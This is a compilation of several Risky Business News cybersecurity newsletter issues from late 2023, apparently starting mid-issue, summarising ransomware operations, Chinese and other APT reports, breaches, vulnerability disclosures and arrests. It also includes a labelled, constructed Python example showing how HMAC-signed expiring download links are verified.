
Artemis Refund Group: The US government has arrested members of the Artemis Refund Group, a criminal gang that specializes in large-scale refund fraud. The group works with insiders at retailers and helps customers place large orders and then recover their money but keep the products. The group operates via Telegram, and their most common tactic revolves around filing Did-Not-Arrive complaints. [Additional coverage in 404 Media]

Monopoly Market admin pleads guilty: A Serbian national has pleaded guilty in a US court to running Monopoly Market, a dark web drug market. Milomir Desnica, 33, was arrested in Austria in November 2022 and extradited to the US earlier this year. The Monopoly Market was taken down by German authorities in December 2021. Intelligence collected during the takedown was used to detain 288 drug traders in May this year, part of Operation SpecTor. Europol called it its most successful operation against dark web marketplaces so far.

Qakbot takedown aftermath: A KELA report found that the law enforcement takedown of the Qakbot botnet has had a minimal impact on the cybercrime underground, with many former Qakbot members and customers continuing to collaborate on operations.

Hunters International: Bitdefender has an analysis of recent attacks carried out by an extortion group named Hunters International, a rebrand of the Hive ransomware group.

Nokoyawa RaaS shuts down: The Nokoyawa ransomware operation shut down in October 2023 after a decision by its creator, a threat actor named Farnetwork. Prior to Nokoyawa, the same individual helped create and run other ransomware strains, such as JSWORM, Nemty, Nefilim, and Karma. Security firm Group-IB believes Farnetwork will most likely launch another RaaS platform under a new name.

New ransomware trends: The FBI says that since 2022, ransomware gangs have breached third-party gaming vendors as a way to gain access and encrypt the networks of US casinos. The attacks have targeted small and tribal casinos and are separate from the MGM and Caesars hacks that took place this August. The FBI says it is also seeing ransomware gangs use callback-phishing and remote access tools to gain access to corporate employee systems. One of the groups that has used this technique is the Silent Ransom Group, also known as Luna Moth. [Additional information in the FBI's PIN]

Ransomware campaigns: AhnLab is seeing phishing campaigns distribute the Phobos and LockBit ransomware.

WindowsReport/CPU-Z malvertising campaign: Malwarebytes has spotted a malvertising campaign activating on Google Search. The campaign used a clone of the WindowsReport tech news site to lure users to a malicious installer for the popular processor tool CPU-Z.

Google Forms abuse: Cisco Talos has discovered spam groups abusing the "Release scores" feature of Google Forms quizzes to deliver malicious mail to victims. Because the emails originate from Google servers, the campaigns bypass email security solutions. Talos says it saw abuse of this feature as far back as 2021, but volumes spiked this year.

SLP protocol enters abuse: CISA says threat actors are exploiting a vulnerability in the Service Location Protocol (SLP) to launch DDoS attacks in the wild. News of active exploitation comes six months after security firms said the protocol could be abused for the largest DDoS attacks known to date. Companies like Bitsight and Curesec said SLP had a DDoS amplification factor of 2,200, the third largest factor known to date. DDoS attacks abusing SLP come two weeks after a researcher posted a proof-of-concept tool on GitHub. The vulnerability that enables these attacks is tracked as CVE-2023-29552.

Sordeal releases free version: Per CyFirma security researcher Kaushík Pał, Nova Sentinel, the author of the Sordeal infostealer, has released a free version of their malware.

Malware technical reports

BlazeStealer: Checkmarx has discovered a malicious campaign on PyPI distributing a new malware strain, BlazeStealer. Controlled via a Discord bot, the malware can be used to steal credentials from infected hosts, take screenshots via the webcam, and even deploy additional malware.

GhostLocker: Rapid7 looks at GhostLocker, a RaaS created by the GhostSec "hacktivist" group.

Sponsor Demo

Senior Sales Engineer Ali Cheikh demonstrates the runZero platform to Risky Business host Patrick Gray. runZero is a cyber asset management tool that combines active scanning, passive discovery, and API integrations to discover IT, OT, and IoT assets (both managed and unmanaged) across your network, including cloud, mobile, and remote environments.

APTs, cyber-espionage, and info-ops

NSA's SecondDate: Chinese security researchers have published a technical analysis of SecondDate, a malware strain first detailed in the Snowden leaks (2013). In September, the Chinese MSS claimed the NSA used the malware as recently as June 2022 to hack the network of the Xi'an Northwestern Polytechnical University.

Black Cube campaign: Microsoft's security team says that Israeli private intelligence agency Black Cube (tracked as Blue Tsunami) is conducting LinkedIn phishing campaigns. The company uses honeypot profiles, fake jobs, and fake companies to engage in reconnaissance or human intelligence (HUMINT) operations on behalf of its customers.

Caracal Kitten: Chinese security researchers have a breakdown of a new mobile RAT used by the Caracal Kitten APT.

MuddyWater's MuddyC2Go: Deep Instinct researchers have analyzed MuddyC2Go, a new command and control (C2) framework used by Iranian cyber-espionage group MuddyWater. The framework is written in Go and has been used in attacks since 2020.

No Iran-Hamas cyber cooperation so far: Microsoft says it has not seen any signs of cyber cooperation between Iran and Hamas hackers, either prior to or after the start of the recent Hamas-Israeli conflict last month.

Sapphire Sleet: Microsoft says it is seeing the Sapphire Sleet APT setting up new infrastructure for its LinkedIn social engineering campaigns. The group, also known as BlueNoroff, has a history of targeting individuals working in the cryptocurrency space.

Asian APTs: Kaspersky has a top-down look at the recent tactics employed by "modern" Asian APTs in their intrusions across the globe. The report is 370 pages long and mainly covers attacks from Chinese APTs, such as Stone Panda, Emissary Panda, Mustang Panda, APT41, and others.

Chinese APT in Cambodia: Chinese state-sponsored hackers have breached at least 24 Cambodian government agencies in one of the largest compromises of the year. The intrusions were spotted by security firm Palo Alto Networks, which detected traffic going from the compromised agencies to the infrastructure of a Chinese APT group. The infrastructure had been disguised to look like cloud backup services. According to Palo Alto, hackers seem to have gained access to government agencies responsible for national defense, elections, finances, telecommunications, and natural resources.

Kremlin "influence-for-hire" firms: The US State Department says the Kremlin is using three "influence-for-hire" companies to spread its propaganda across Latin America. Officials say companies such as the Social Design Agency, the Institute for Internet Development, and Structura have helped plant pro-Russian stories with local news outlets and social media influencers. The State Department says the articles are written in Russia, translated to Spanish or Portuguese, and then sent to the three companies for promotion across local news outlets. Officials have named Ilya Gambashidze as the lead in Russia's disinformation effort in Latin America.

New Sandworm power grid attack: Russian military hackers breached the network of a Ukrainian power grid operator in June 2022 and launched a cyber-attack that crashed its OT environment to trigger a power outage in October 2022. This marks the third time since 2014 that Russian hacking group Sandworm has triggered a power outage in Ukraine using solely cyber tools. Mandiant says the cyber-attack coincided with missile strikes on critical infrastructure across Ukraine. The security firm told Wired reporter Andy Greenberg that they don't have evidence to support the theory that Russia intended the blackout and bombings to be simultaneous, but Mandiant pointed out that Sandworm held on to access to the hacked power grid for weeks prior to deploying their attack just before the kinetic missile strikes.

Vulnerabilities, security research, and bug bounty

Defiant bug bounty program: Security firm Defiant, the maker of the Wordfence firewall plugin for WordPress sites, has launched a private bounty program. The program will work like ZDI and will pay researchers to find vulnerabilities and disclose them privately to its program. Defiant will then handle disclosing and getting a fix pushed out for the bugs.

Azure Automation Service: Security firm SafeBreach has developed several ways to abuse the Azure Automation Service and execute code without getting charged—a useful feature for crypto-mining gangs. The company released a tool named CloudMiner that exploits these loopholes, some of which have been patched by Microsoft.

NTLM leak: Check Point researchers have identified a vulnerability in Microsoft Access databases that can be used to bypass firewalls and leak a Windows user's NTLM password hash. The technique abuses a Microsoft Access feature named Linked Table that allows Access databases to link to each other's tables. Check Point says the feature is exempt from local firewall rules, allowing attackers to piggyback on it and send NTLM hashes out of a network.

Netgear vulnerability: QuarksLab has published a write-up on CVE-2023-27368, a vulnerability in the soap_serverd daemon of Netgear routers. The company used the vulnerability in the 2022 edition of the Pwn2Own Toronto hacking contest.

PRTG RCE: Bladur Security has found an RCE (CVE-2023-32782) in the PRTG Network Monitor utility, often used in data centers and corporate networks.

Visual Studio Code vulnerabilities: SonarSource researchers have published part one of their three-part series on vulnerabilities they found in Microsoft's Visual Studio Code app. The team's DEFCON talk is below.

Infosec industry

Virus Bulletin 2023 videos: Talks from the Virus Bulletin 2023 security conference, which took place last month, are available on YouTube.

No Hat 2023 videos: Talks from the No Hat 2023 security conference, which took place last month, are available on YouTube.

New tool—ConscryptTrustUserCerts: NCC Group has open-sourced a tool named ConscryptTrustUserCerts that can be used for intercepting (some) HTTPS traffic on Android 14.

Risky Business Podcasts

In this edition of Between Two Nerds, Tom Uren and The Grugq talk about the internet-melting 1988 Morris Worm and how cyber security has changed since then.

Risky Biz News: Chinese APTs evolve towards stealth, zero-day abuse

8 November 2023 at 00:30

This newsletter is brought to you by asset inventory and network visibility company runZero. You can subscribe to an audio version of this newsletter as a podcast by searching for "Risky Business News" in your podcatcher or subscribing via this RSS feed. On Apple Podcasts:

Chinese state-sponsored hacking operations have undergone a major shift in recent years, with groups growing in sophistication and abandoning noisy and high-volume campaigns for stealthy and extremely targeted attacks.

If you read APT reports for a living—like this newsletter's author—then nothing in the above sentence is new to you.

Over the past two or three years, there have been numerous reports across the infosec industry about how Chinese APT group "XX" or how Chinese APT group "YY" has changed their modus operandi.

Unless you're constantly reading these reports, it is hard to see the big picture, spot general trends, and notice the slow evolution of Chinese APTs from the OpSec failures of the late 2000s to apex predators in today's global cyber landscape.

Seeing the big picture can be challenging when you're reading text on the back of small puzzle pieces, but the folks at Recorded Future published an excellent report this week that perfectly contextualizes what has been happening with China's APTs in the 2020s.

There are several main conclusions that we will list below, although we recommend you read the report for yourself since it's the most complete picture we've seen assembled on Chinese APT activity in recent years. These are not copy-pasted and include some of our own commentary and additions.

  • Chinese state-sponsored operations are slowly moving away from high-volume targeting. Gone are the days of spear-phishing operations targeting every diplomat under the sun and major corporations with "attractive" intellectual property. Today, Chinese APT groups are more coordinated and thoughtful when selecting targets. Recorded Future puts this on the Chinese government's restructuring of its intelligence and military apparatus in the mid-2010s.

  • Chinese groups are moving away from custom malware and infrastructure to using open-source tools and public exploits.

  • Chinese groups are using networks of compromised routers and IoT equipment as proxy/anonymization tools to hide malicious traffic and infrastructure.

  • Chinese groups have also been among the first APT groups to adopt LOLbins for operations, replacing highly detectable malware with the abuse of locally installed apps. See this CISA advisory here for more.

  • Even if past attribution has linked some Chinese APT groups to private contractors, military units, or intelligence service bureaus, many groups are now sharing tools, suggesting the existence of some sort of private exploit/tooling supply chain across the entire Chinese cyber apparatus. This is giving security companies (see SentinelOne example here) fits when it comes to attribution. This was never a problem in the past, primarily because APT clusters were often easily delineated, the malware code and infrastructure contained many OpSec mistakes, and because of each group's unique TTPs.

  • Since 2021, Chinese APTs have shifted towards the exploitation of public-facing appliances. Targets included appliances such as firewalls, enterprise VPNs, hypervisors, load balancers, and email security products. These are devices found in almost all government and corporate networks and are often used as initial access and pivot points to more "desirable" sections of a target's network.

  • This shift towards targeting public-facing appliances has stood out like a sore thumb. In fact, Recorded Future says that 85% of all the zero-days abused by Chinese APTs since 2021 have been in public-facing appliances, showing how crucial (the targeting of) these devices has become to Chinese cyber operations.

  • Chinese APT groups have also been among the first to exploit publicly-known vulnerabilities in these types of products, for the same reason, to get perches inside highly sought-after targets before anyone else.

  • Just like Microsoft in its Digital Defense Report last year and the Atlantic Council in a report this year, Recorded Future puts China's increased usage of zero-days on the country's new vulnerability disclosure law that allows the country's intelligence security agency to learn of new vulnerabilities before patches are out.

  • China has heavily invested in increasing the sheer size of its cyber forces, which means the country is now capable of both qualitative and quantitative operations.

Finally, the report also includes an attribution map for China's APT groups, including their suspected geographical locations. This is in line with what Sekoia published earlier this year, too.

Breaches, hacks, and security incidents

Monero Project hack: A threat actor has emptied the community wallet of the Monero Project and stolen $450,000 worth of community donations. The hack took place on September 1st but was only discovered four weeks later, on the 28th. The Monero team says it has not found how the hacker stole the funds.

Bitfinex breach: Cryptocurrency exchange Bitfinex says a threat actor successfully phished and gained access to the account of one of its customer support agents. The company says the hacker gained access to a small amount of customer information because the support agent had limited permissions. Bitfinex says most of the affected customer accounts were either empty or inactive.

Frax Finance DNS hijack: DeFi platform Frax Finance suffered a DNS hijacking attack last week that saw its engineers lose control over its two main domains frax[.]finance and frax[.]com.

Shimano ransomware attack: Bike component manufacturer Shimano suffered a ransomware attack, and more than 4.5TB of data was stolen in the incident. The attack has been claimed by the LockBit ransomware group. [Additional coverage in CyclingNews]

Zhefengle leak: Chinese e-commerce platform Zhefengle has leaked information on more than 3.3 million orders placed on its site between 2015 and 2020. The data included the personal details of millions of Chinese citizens, such as names, phone numbers, and home addresses. For some orders, buyers also had to provide copies of their identity cards, which also leaked in the incident. According to CloudDefense's Viktor Markopoulos, the data leaked after the Chinese company left one of its databases exposed on the internet without a password. [Additional coverage in TechCrunch]

Fake LinkedIn breach: Troy Hunt, the founder of the Have I Been Pwned service, has disproven claims made this week by a hacker named USDoD that they breached social media company LinkedIn. It's fake, people. Calm down!

"To lead with the conclusion and save you reading all the details if you're not inclined, the dataset so many people flagged me this week titled 'Linkedin Database 2023 2.5 Millions' turned out to be a combination of publicly available LinkedIn profile data and 5.8M email addresses mostly fabricated from a combination of first and last name."

General tech and privacy

Mandatory MFA for Microsoft admin portals: Microsoft is enabling mandatory multi-factor authentication for customers logging into any of its cloud admin portals. The change will impact Azure, Microsoft 365, and Exchange admin centers. Microsoft joins the ranks of AWS and Oracle as cloud services that require mandatory MFA to access admin accounts.

Discord switches to temp file URLs: Instant messaging service Discord will start hosting file uploads on temporary URLs by the end of the year. The company says all temporary URLs will expire after 24 hours, with files also being deleted from its servers. Discord says it is making the switch in an attempt to prevent threat actors from using its platform for hosting malware or parts of cybercrime infrastructure. [Additional coverage in BleepingComputer]
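The Discord item describes the effect (links that stop working after 24 hours and files that are then deleted) but not how a service enforces it. The example below is added here and is not Discord's code; it shows the standard design for such expiring links, an expiry timestamp bound to the file path by an HMAC, so a recipient cannot extend a link's lifetime or re-point it at another file by editing the query string. The host, the `ex`/`sig` parameter names, the key, and the paths are all constructed for the demo.

```python
import hmac
import hashlib
from urllib.parse import urlencode, urlparse, parse_qs

# Constructed demo values: not a real key and not Discord's parameter names.
DEMO_SECRET = b"constructed-demo-signing-key"
TTL_SECONDS = 24 * 60 * 60  # the 24-hour lifetime described in the item


def _signature(path: str, expires: int, secret: bytes) -> str:
    # Sign path and expiry together so neither can be altered on its own.
    msg = f"{path}|{expires}".encode()
    return hmac.new(secret, msg, hashlib.sha256).hexdigest()


def sign_url(base: str, path: str, now: int,
             secret: bytes = DEMO_SECRET, ttl: int = TTL_SECONDS) -> str:
    """Mint a URL for `path` that is valid until now + ttl (hypothetical scheme)."""
    expires = now + ttl
    query = urlencode({"ex": expires, "sig": _signature(path, expires, secret)})
    return f"{base}{path}?{query}"


def verify_url(url: str, now: int, secret: bytes = DEMO_SECRET) -> tuple:
    """Server-side check of an expiring URL. Returns (accepted, reason)."""
    parsed = urlparse(url)
    params = parse_qs(parsed.query)
    try:
        expires = int(params["ex"][0])
        presented = params["sig"][0]
    except (KeyError, ValueError, IndexError):
        return False, "missing or malformed parameters"
    expected = _signature(parsed.path, expires, secret)
    # Constant-time comparison so a timing side channel does not leak the MAC.
    if not hmac.compare_digest(presented, expected):
        return False, "bad signature"
    # Only a signed, untampered expiry reaches this point, so the clock check
    # cannot be defeated by rewriting `ex` in the query string.
    if now >= expires:
        return False, "expired"
    return True, "ok"


def demo() -> dict:
    """Exercise the happy path and the three failure modes on constructed input."""
    base = "https://cdn.example.invalid"          # constructed host
    path = "/attachments/1234/report.pdf"         # constructed path
    t0 = 1_700_000_000                            # fixed 'now' for reproducibility
    url = sign_url(base, path, t0)
    expires = t0 + TTL_SECONDS
    return {
        "fresh": verify_url(url, t0 + 3600),
        "after_24h": verify_url(url, expires),
        "tampered_path": verify_url(url.replace("report.pdf", "other.pdf"), t0 + 3600),
        "tampered_expiry": verify_url(
            url.replace(f"ex={expires}", f"ex={expires + 10 * TTL_SECONDS}"), t0 + 3600),
    }


if __name__ == "__main__":
    for case, result in demo().items():
        print(f"{case:16} -> {result}")
```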

Twitter disinformation: Several social media research groups have abandoned studies of disinformation on Twitter after the company raised API access prices through the roof and after Elon Musk started suing researchers who published studies claiming the site was helping push state-backed propaganda (like we needed a study to see the obvious in Twitter's Trending section), per a Reuters report.

Government, politics, and policy

Anti-DPRK cooperation: Officials from Japan, South Korea, and the US launched a cooperation group to counter North Korea's cyber operations, which have been used to finance its weapons program. [Additional coverage in Reuters]

FISA reform legislation: US lawmakers have introduced a new bill to reauthorize US surveillance powers under Section 702 of the Foreign Intelligence Surveillance Act, set to expire at the end of the year. Named the Government Surveillance Reform Act, the bill adds protections for US citizens. The primary change will require US law enforcement agencies to obtain a court warrant before searching the data of US citizens against the FISA data set. The Section 702 reform comes after ODNI found multiple cases of FISA misuse over the past years. The bill also goes beyond FISA and prohibits US government agencies from purchasing Americans' data from data brokers, a tactic used in the past for warrantless surveillance. The bill has been introduced on both floors of the US Congress and has bipartisan support. [Additional coverage in JustSecurity and Cyberscoop]

Sponsor section

In this Risky Business News sponsor interview, Tom Uren talks to Huxley Barbee, Security Evangelist at runZero, about finding the unknown unknowns and what a security evangelist is.

Cybercrime and threat intel

Indian crypto-scam group detained: Indian authorities have detained eight suspects who stole $300 million (₹2,500 crore) from a cryptocurrency investment fund. The scheme lured victims to invest saved rupees into a cryptocurrency project. More than 5,000 government employees from the Himachal Pradesh state lost funds when the scheme collapsed, and some of its administrators fled to Dubai. Four of the 18 detained suspects work for the Himachal Pradesh police force. [Additional coverage in The Times of India]

Anonymous Sudan: Netscout takes a look at the DDoS makeup and capabilities of the Anonymous Sudan pro-Kremlin "hAcKtIvIsT" group. Just a reminder that the group is a Russian operation.

"Initially, all posts to Telegram were in Russian, which called into question the veracity of the group's selection of name and purported origin. As other researchers have noted Anonymous Sudan eventually started using Arabic in posts and eventually switched to Sudanese dialects. Many of the initial posts in Russian have since been deleted or removed. The group often overlooks actions taken against Sudan or Islam in non-Western countries."

Malware technical reports

D0nut ransomware: NCC Group has published a report reviewing the tactics used by the D0nut ransomware and extortion group.

Mallox ransomware: Chinese security firm Tinder has published a report on a threat actor using brute-force attacks to breach MSSQL databases and deploy the Mallox ransomware.

Jupyter Infostealer: VMWare's Carbon Black analyzes new versions of the Jupyter infostealer, a malware strain first spotted in 2020 and also known as Yellow Cockatoo, Solarmarker, and Polazert.

GootBot: IBM's X-Force team has discovered a new component of the GootLoader malware that is currently being deployed on corporate networks to facilitate easier lateral movement. The new component is named GootBot, and X-Force says the component is used instead of the Cobalt Strike framework.

SecuriDropper: Researchers at mobile security firm ThreatFabric have discovered a new malware operation named SecuriDropper that can bypass the "Restricted Settings" security feature in Android 13. The Restricted Settings feature works by blocking side-loaded apps from accessing sensitive permissions. The SecuriDropper malware infects Android smartphones via malicious side-loaded apps, bypasses the Restricted Settings limitation, and then downloads additional malware payloads. SecuriDropper is available as a Dropper-as-a-Service, and its creator makes money by renting access to other criminal groups to drop any payload they want on the infected devices. SecuriDropper is the second known malware strain that can bypass Android 13's Restricted Settings feature after Zombinder.

Sponsor Demo

Senior Sales Engineer Ali Cheikh demonstrates the runZero platform to Risky Business host Patrick Gray. runZero is a cyber asset management tool that combines active scanning, passive discovery, and API integrations to discover IT, OT, and IoT assets (both managed and unmanaged) across your network, including cloud, mobile, and remote environments.

APTs and cyber-espionage

Agonizing Serpens: An Iranian hacking group named Agonizing Serpens has conducted multiple destructive attacks against Israeli organizations in the education and technology sectors. The group has been active since 2020 and is known for breaching networks to collect intelligence and then deploying ransomware or wipers to hide its tracks and disrupt the victim's operations. According to Palo Alto Networks, the group's recent hacking campaign lasted from January to October this year and involved three data wipers named MultiLayer, PartialWasher, and BFG Agonizer. The group is also known as Agrius, Pink Sandstorm, and BlackShadow, and Microsoft has linked [PDF] it to Iran's Ministry of Intelligence and Security.

AridViper: SentinelOne has a report on AridViper, the APT group allegedly run by Hamas members. The report focuses on the group's operations targeting Android smartphones, also covered in this Talos report.

"Through 2022 and 2023, the actor has distributed SpyC23, an Android spyware family, through weaponized apps posing as Telegram or as a dating app called Skipped."

SideCopy: SEQRITE delves into recent SideCopy APT operations that have leveraged a recent WinRAR zero-day (CVE-2023-38831) to deploy versions of the DRat and AllaKore RATs. It also covers attacks against Linux systems with the Ares RAT.

Evilnum/DarkCasino: NSFOCUS looks at how the Evilnum/DarkCasino fin group has incorporated the same WinRAR zero-day (CVE-2023-38831) in its attacks.

BlueNoroff: Jamf has published a report on a recent campaign of the BlueNoroff DPRK APT that targeted macOS users with a new malware strain written in Objective-C and named ObjCShellz.

Vulnerabilities, security research, and bug bounty

QNAP security updates: Taiwanese NAS vendor QNAP has released four security updates for its products.

Veeam security updates: Cloud backup provider Veeam has released security updates to patch four vulnerabilities.

Bitrix24: Researchers at STAR Labs have found and helped patch seven vulnerabilities in the Bitrix24 CRM platform.

BatSignal: Security researcher Gergely Kalman has published a technical write-up on BatSignal (CVE-2022-26704), an unprivileged user to root elevation of privilege vulnerability in macOS.

Printer vulnerabilities: Devcore has published part two of a write-up on three printer vulnerabilities it used at the Pwn2Own hacking contest back in 2021. The vulnerabilities are pre-auth RCEs and impact Canon, HP, and Lexmark printers.

Zephyr Project vulnerabilities: Security researcher Marco Ivaldi has found 12 vulnerabilities in the Zephyr real-time OS.

Atlassian exploitation: A threat actor is exploiting a recently patched vulnerability (CVE-2023-22518) in Atlassian Confluence systems to bypass authentication and encrypt servers with the C3rb3r ransomware. This version of the C3rb3r ransomware is based on the leaked Conti ransomware code and is not related to the old and more infamous Cerber ransomware from the mid-2010s. The attacks began over the weekend and were spotted by security firms Red Canary, Huntress, and Rapid7. The group is one of the many threat actors that are currently targeting Confluence systems after mass exploitation began at the end of last week. Following reports of active attacks, Atlassian also updated the bug's severity score from a 9.1 to a 10/10.

VEX guide: CISA has published a document on how companies can issue a VEX (Vulnerability Exploitability eXchange) alert when bugs in their software are being actively exploited in the wild.

Infosec industry

Ekoparty 2023 videos: Talks from the Ekoparty 2023 security conference, which took place last week, are available on YouTube. All the talks are in Spanish.

Hexacon 2023 videos: Talks from the Hexacon 2023 security conference, which took place earlier this month, are available on YouTube.

Dutch Police podcast: The Dutch Police's cybercrime unit is launching a podcast discussing some of its biggest operations. The first episode covers the Rubella malware takedown, and the podcast will have six episodes. Obviously, the podcast is in Dutch.

Acquisition news: Palo Alto Networks has announced plans to buy browser security startup Talon Security for $625 million. The deal comes after Palo Alto also bought cloud security firm Dig Security last week for $400 million.

New tool—PatchaPalooza: Cybersecurity researcher Alexander Hagenah has released PatchaPalooza, a tool that provides an analysis of Microsoft Patch Tuesday updates. Also available as a standalone interactive website.

Risky Business Podcasts

In this edition of Between Two Nerds, Tom Uren and The Grugq talk about the internet-melting 1988 Morris Worm and how cyber security has changed since then.

Risky Biz News: US sanctions Russian woman for laundering money for Ryuk gang, Russian elites

6 November 2023 at 00:30

This newsletter is brought to you by asset inventory and network visibility company runZero. You can subscribe to an audio version of this newsletter as a podcast by searching for "Risky Business News" in your podcatcher or subscribing via this RSS feed. On Apple Podcasts:

The US Treasury has sanctioned a Russian businesswoman named Ekaterina Zhdanova for helping Russian oligarchs and cybercrime gangs evade sanctions and launder stolen cryptocurrency.

Officials say Zhdanova worked as an intermediary in order to obfuscate the real nature of various illegal transactions.

She disguised operations using traditional businesses operating overseas but also used accounts at cryptocurrency platforms that did not enforce anti-money laundering (AML/CFT) controls.

Officials say Zhdanova operated a luxury watch company with offices around the world in order to maintain access to the global financial system. She was also a customer of Garantex, a Russian cryptocurrency exchange the Treasury sanctioned in April 2022 for laundering more than $100 million in cybercrime proceeds.

According to US officials, Zhdanova was involved in laundering more than $105 million for her customers.

She allegedly helped Russian oligarchs evade sanctions imposed shortly after Russia's invasion of Ukraine.

Zhdanova allegedly helped one client move $2.3 million to Western Europe in the form of real estate purchases and investment accounts and helped another customer move $100 million from Russia to the United Arab Emirates.

Officials also believe Zhdanova is running a scheme to help Russian oligarchs obtain tax residency in the UAE and conceal their identities.

But before the war began and Zhdanova's services came to be in high demand with Russian elites, officials say she worked with cybercrime groups, with one customer being one of the affiliates of the Ryuk ransomware gang, for whom she laundered more than $2.3 million in victim payments.

An article in Russian media claims Zhdanova is a former business partner of Irina Shoigu, the wife of Sergei Shoigu, Russia's Defense Minister, which may explain her connections to Russia's oligarch scene.

Zhdanova was also interviewed by one of Russia's social life magazines, where she claimed to have "conquered Moscow" after growing up in Altai, a region in Southern Siberia.

Per the US officials, Zhdanova is most likely still in Moscow. The Treasury's sanctions division has sanctioned three of Zhdanova's blockchain addresses and added her name to the OFAC list.

Image via CorruptionTV on Telegram

Breaches, hacks, and security incidents

Okta hack update: Okta has finished its investigation into the September hack of its customer support system, and the company says the intruders gained access to the data of 134 customers, representing less than 1% of its total customer base. Of all these, the hackers pivoted and accessed the networks of only five Okta customers. Three of the five customers are already known after publicly disclosing their breaches and include BeyondTrust, Cloudflare, and 1Password. Okta also blamed the hack on an employee who used a personal Google account on a work laptop. The company says the employee accidentally synced their work credentials to the personal account from where the Okta work credentials were later stolen.

Mr. Cooper cyberattack: Mortgage and lending company Mr. Cooper has shut down its IT systems in the aftermath of a cyberattack. The incident took place on October 31 and has caused a days-long outage for the company, including for its public website and payment systems. The company is the US' leading lending service.

Ace Hardware cyberattack: Almost 200 servers and 1,000 systems have been impacted by a cyberattack at Ace Hardware, one of the US' largest hardware store chains. The incident took place on October 30 and has impacted the company's ability to pick up new customer orders. Other impacted systems include warehouse management systems, reward points program, tech support call center, and the company's mobile assistant. Despite the attack, the company's 5,700 stores have remained open, although with reduced activity. [Additional coverage in BleepingComputer]

General tech and privacy

Drupal 9 EoL: Version 9 of the Drupal CMS has reached End-of-Life status on November 1, 2023.

Mandatory MFA on Oracle Cloud: Oracle has enabled multi-factor authentication by default for all its Oracle Cloud customers. The policy has been enforced for all new cloud tenants and retroactively applied to all existing customers. Oracle's move comes after Amazon also made MFA mandatory for new AWS root accounts.

Google abandons Web DRM plan: Google has abandoned its plan to develop the Web Environment Integrity API, a system that many experts believe would have created a DRM for the entire web and allowed websites to block anyone from modifying their code when rendered in a browser.

Google joins eIDAS protest: Google has joined the ranks of more than 300 companies, cybersecurity, and privacy experts that have called on EU officials to revise its upcoming eIDAS (Electronic Identification, Authentication and Trust Services) regulation. Experts have called attention to a new article added to the eIDAS regulation that will mandate web browsers to automatically trust certificates issued by EU states. Experts say the article was added to eIDAS behind a closed-door meeting and without any public review. The new requirement will allow member states to easily intercept web traffic.

VPN security audit labels: Google has started showing a special label on the Play Store pages of VPN apps that have conducted a security audit of their code. The new label reads "Independent security review" and is listed in an app's Data Safety section. Eight VPN providers have already received the label, but any VPN app maker can obtain it by submitting itself to a security review through the Mobile App Security Assessment program.

Government, politics, and policy

Domestic tech abuse bill reintroduced: US senators reintroduced a new version of the "Tech Safety for Victims of Domestic Violence, Dating Violence, Sexual Assault and Stalking Act." The bill aims to help prevent domestic abusers from using technology to stalk, harass, or control survivors. A first version was introduced last December, but the bill died in the Senate Judiciary Committee. The new bill would fund 15 clinics across the US to support victims of tech-enabled abuse and fund educational programs to train individuals to help victims.

Apple warns Armenians about state-sponsored attacks: Apple has sent private notifications to Armenians warning of state-backed hacking activity targeting their devices. This marks the fifth wave of state-backed notifications that Apple has sent to Armenian users. The first wave was sent out in 2020 during the second Nagorno-Karabakh war. The last was sent in March this year during the latest round of fighting. In past cases, security experts found traces of the Pegasus spyware on the infected devices. [Additional coverage in ArmenPress]

Greece's Predatorgate scandal: A Mediapart investigation found that the Predator spyware was deployed to the devices of Greek politicians after victims received SMS messages from a former secretary of Kyriakos Mitsotakis, the country's current prime minister. Grigoris Dimitriadis, the former secretary, denies any involvement.

Moldova's report on Russia's hybrid warfare: Moldova's intelligence agency has published a 32-page report describing the "hybrid warfare" Russia has been using in attempts to destabilize and overthrow its government. The report is in Romanian and covers everything from hack-and-leaks to disinformation campaigns and from bribery of state officials to actual paramilitary coup attempts.

NCSC post-quantum guide: The UK's NCSC agency has published guidance to help organizations prepare for the migration to post-quantum cryptography (PQC).

ACSC translates cybersecurity guides: The Australian Cyber Security Centre has translated its five basic cybersecurity guides into 27 languages.

Sponsor section

In this Risky Business News sponsor interview, Tom Uren talks to Huxley Barbee, Security Evangelist at runZero, about finding the unknown unknowns and what is a security evangelist.

Cybercrime and threat intel

Phisher detained in Indonesia: Indonesian authorities have detained a 36-year-old man for developing and selling access to a phishing kit. The suspect was detained following a joint investigation between US, UK, Australian, Canadian, and Indonesian authorities. He faces up to 12 years in prison. The suspect is the second Indonesian arrested this year for developing and selling a phishing kit. Authorities previously arrested the owner of the 16Shop phishing kit in August. [Additional coverage in AccountingWeb]

Phisher detained in Belgium: Belgian prosecutors are asking for two years in prison and a €5,000/day fine for an 18-year-old suspect who is refusing to provide passwords to his phone, computer, and servers. Officials arrested the teen in October on suspicion of being part of a phishing gang. The prosecution says the teen is ignoring a judge's order to release the passwords to investigators. The teen's camp argues that the passwords are part of his right to remain silent. [Additional coverage in NieuwsBlad]

Umbreon sentenced: Dutch authorities have sentenced a 21-year-old man from Zandvoort to four years in prison on hacking-related offenses. Named Pepijn Van der Stap, the suspect was known on hacking forums as Umbreon. Officials say Van der Stap was the leader of a trio of hackers that broke into corporate networks, stole sensitive data, and extorted the companies by threatening to publish their data. The group asked between €100,000 and €700,000 from each victim, and officials believe Van der Stap earned more than €2.5 million through extortion or by selling the hacked data. Van der Stap also worked as a security researcher for Hadrian Security and was a volunteer for the Dutch Institute for Vulnerability Disclosure, a Dutch cybersecurity collaboration group. [h/t PogoWasRight]

JFK hackers charged: The US Department of Justice has charged two Russian nationals with hacking the taxi dispatch system at the JFK airport in New York. The duo worked with two Americans who helped promote a scheme where drivers could pay a $10 fee and skip the airport's taxi waiting line. The two Americans were charged and arrested in December 2022, and both pleaded guilty last month.

BEC recovery: The DOJ recovered $2.4 million stolen from a company in April 2021 following a BEC scam.

MFA smishing alert: The Romanian cybersecurity agency has detected a smishing campaign that targets Romanian citizens with attempts to intercept 2FA/MFA codes. The attackers claim that one of their 2FA/MFA codes was sent to the victim by accident and ask the victim to forward it. The code is in fact the one-time code for the victim's own account, which the attackers triggered themselves, so forwarding it lets them complete the login and compromise the account.

New npm malware: Six malicious npm packages were discovered last week. Check out GitHub's security advisory portal for more details.

More npm malware: DevSecOps company Phylum has discovered 48 JavaScript packages passing as legitimate libraries on the official npm portal. Researchers say the malicious libraries are designed to initiate a reverse shell when the package is installed. Although the first wave of packages was removed, the attack is still ongoing.
